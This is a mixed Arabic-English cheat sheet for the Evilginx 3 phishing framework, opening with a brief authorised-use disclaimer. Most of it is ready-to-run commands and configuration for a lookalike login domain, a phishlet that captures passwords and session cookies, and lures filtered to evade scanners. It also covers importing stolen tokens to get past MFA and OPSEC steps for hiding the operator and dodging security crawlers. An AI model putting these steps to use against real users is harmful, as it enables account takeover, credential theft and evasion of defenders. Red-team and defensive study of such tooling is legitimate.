Evilginx 3

Evilginx 3 هو إطار عمل هجوم adversary-in-the-middle (AiTM) يعمل كوكيل عكسي بين الضحية وموقع ويب شرعي لالتقاط بيانات الاعتماد وملفات تعريف الجلسة ورموز المصادقة في الوقت الفعلي، بما في ذلك تلك المحمية بالمصادقة متعددة العوامل.

إخلاء المسؤولية: هذه الأداة مخصصة حصرياً لاختبارات الاختراق المصرح بها وعمليات الفريق الأحمر والبحث الأمني. الاستخدام غير المصرح به لـ Evilginx ضد الأنظمة والمستخدمين بدون موافقة كتابية صريحة غير قانوني بموجب قوانين الاحتيال الحاسوبي في جميع الولايات القضائية تقريباً. احصل دائماً على التفويض المناسب وحدد النطاق واتبع ممارسات الإفصاح المسؤول.

التثبيت

# Install Go (required)
wget https://go.dev/dl/go1.22.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.22.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

# Clone and build Evilginx 3
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make

# Or install via Go
go install github.com/kgretzky/evilginx2@latest

# Run (requires root for port 443)
sudo ./evilginx -p ./phishlets

Initial التكوين

DNS Setup

# Before running Evilginx, configure DNS records:
# 1. Register a domain (e.g., example-login.com)
# 2. Point the domain's nameservers to your Evilginx server

# Required DNS records (set at registrar or DNS provider):
# A record:  example-login.com    -> YOUR_SERVER_IP
# A record:  *.example-login.com  -> YOUR_SERVER_IP

# Evilginx will auto-provision Let's Encrypt certificates

تكوين الخادم

# In the Evilginx console:

# Set the server's external IP
config ipv4 external YOUR_SERVER_IP

# Set the phishing domain
config domain example-login.com

# Set the redirect URL (where to send non-phishing traffic)
config redirect_url https://www.wikipedia.org

# View current configuration
config

Phishlets

Listing and Loading Phishlets

# List available phishlets
phishlets

# View details of a specific phishlet
phishlets get-hosts o365

# Enable a phishlet
phishlets enable o365

# Disable a phishlet
phishlets disable o365

# Set hostname for a phishlet
phishlets hostname o365 login.example-login.com

Phishlet Structure

# Example phishlet YAML structure (simplified)
# Located in ./phishlets/example.yaml

name: 'example'
author: 'author'
min_ver: '3.0.0'

proxy_hosts:
  - phish_sub: 'login'
    orig_sub: 'login'
    domain: 'example.com'
    session: true
    is_landing: true

  - phish_sub: 'api'
    orig_sub: 'api'
    domain: 'example.com'

sub_filters:
  - triggers_on: 'login.example.com'
    orig_sub: 'login'
    domain: 'example.com'
    search: 'example.com'
    replace: '{hostname}'
    mimes: ['text/html', 'application/javascript']

auth_tokens:
  - domain: '.example.com'
    keys: ['session_token', 'auth_cookie']

credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'

login:
  domain: 'login.example.com'
  path: '/authenticate'

Lures

Creating Lures

# Create a lure for a phishlet
lures create o365

# List all lures
lures

# Get the phishing URL for a lure
lures get-url 0

# Set a custom redirect URL after capture
lures edit 0 redirect_url https://legitimate-site.com/dashboard

# Set a custom path for the lure
lures edit 0 path /meeting-invite

# Add URL parameters
lures edit 0 params "ref=email&id=12345"

# Set a pause duration (delay before redirect)
lures edit 0 pause 2

Lure Customization

# Set a custom user-agent filter
lures edit 0 ua_filter "Mozilla"

# Set referrer filter (only allow clicks from specific sources)
lures edit 0 referrer "https://outlook.office.com"

# Generate shortened/obfuscated URL
lures get-url 0

# Delete a lure
lures delete 0

Sessions

Viewing Captured Sessions

# List all captured sessions
sessions

# View details of a specific session
sessions 0

# Session details include:
# - Captured username and password
# - Session cookies/tokens
# - IP address and user agent
# - Timestamp
# - Phishlet used

# Delete a session
sessions delete 0

# Delete all sessions
sessions delete all

Extracting Tokens

# View captured cookies for a session
sessions 0

# Tokens are displayed as JSON, ready to import into browser
# Use browser developer tools or a cookie editor extension to import:
# 1. Open browser DevTools > Application > Cookies
# 2. Or use "EditThisCookie" extension
# 3. Import the captured token values

MFA Bypass Mechanics

How Evilginx bypasses MFA:

1. Victim clicks phishing link
2. Evilginx proxies the real login page to the victim
3. Victim enters credentials -> captured by Evilginx
4. Evilginx forwards credentials to real site
5. Real site prompts for MFA -> proxied to victim
6. Victim completes MFA challenge (push, TOTP, etc.)
7. Real site sets authenticated session cookies
8. Evilginx captures the session cookies
9. Attacker imports session cookies -> authenticated without MFA

What this bypasses:
- SMS/voice OTP
- TOTP authenticator apps
- Push notifications (Authenticator, Duo)
- Email OTP

What this does NOT bypass:
- FIDO2/WebAuthn hardware keys (phishing-resistant)
- Client certificate authentication
- Device-bound passkeys

Proxy التكوين

# Evilginx acts as a TLS-terminating reverse proxy:
#
# Victim <-> Evilginx (your domain + cert) <-> Real Website
#
# Traffic flow:
# 1. Victim connects to login.example-login.com (your domain)
# 2. Evilginx terminates TLS with Let's Encrypt cert
# 3. Evilginx proxies request to real login.example.com
# 4. Response is modified (domain replacements) and sent to victim
# 5. Victim sees legitimate-looking page on your domain

# Configure TLS certificate behavior
config autocert true

# Blacklist mode (block bots, scanners)
blacklist unauth

# View blacklisted IPs
blacklist

Redirect Rules

# Configure what happens to non-targeted visitors
config redirect_url https://www.wikipedia.org

# Lure-specific redirects (after credential capture)
lures edit 0 redirect_url https://real-site.com/login?error=session_expired

# The redirect URL should look legitimate:
# - Real login page with "session expired" message
# - Password reset confirmation page
# - Generic "meeting has ended" page

# Redirect on invalid path
# Non-lure URLs automatically redirect to config redirect_url

OPSEC and Stealth

# Recommended operational security practices:

# 1. Use a clean VPS with no ties to your identity
# 2. Register domain through privacy-protected registrar
# 3. Age the domain before use (domain reputation)
# 4. Use CloudFlare or similar CDN to hide server IP
# 5. Set strict user-agent filtering on lures
# 6. Monitor and rotate domains after use
# 7. Enable blacklisting of known security scanners
# 8. Set kill dates on phishing campaigns
# 9. Clean up all artifacts after engagement

# Blacklist known security crawlers
blacklist unauth

# Use a custom landing page for non-targeted traffic
config redirect_url https://www.example.com

Logging and المراقبة

# Evilginx logs all activity to the console and log files

# View real-time activity
# (visible in the Evilginx console as events happen)

# Session data is stored in:
# ./data/sessions.json

# Configuration is stored in:
# ./data/config.json

# Monitor for new captures
sessions
# Check periodically or set up alerting

Cleanup

# After an engagement, clean up thoroughly:

# Delete all sessions
sessions delete all

# Delete all lures
lures delete all

# Disable all phishlets
phishlets disable o365

# Remove the domain configuration
# Decommission the server
# Revoke Let's Encrypt certificates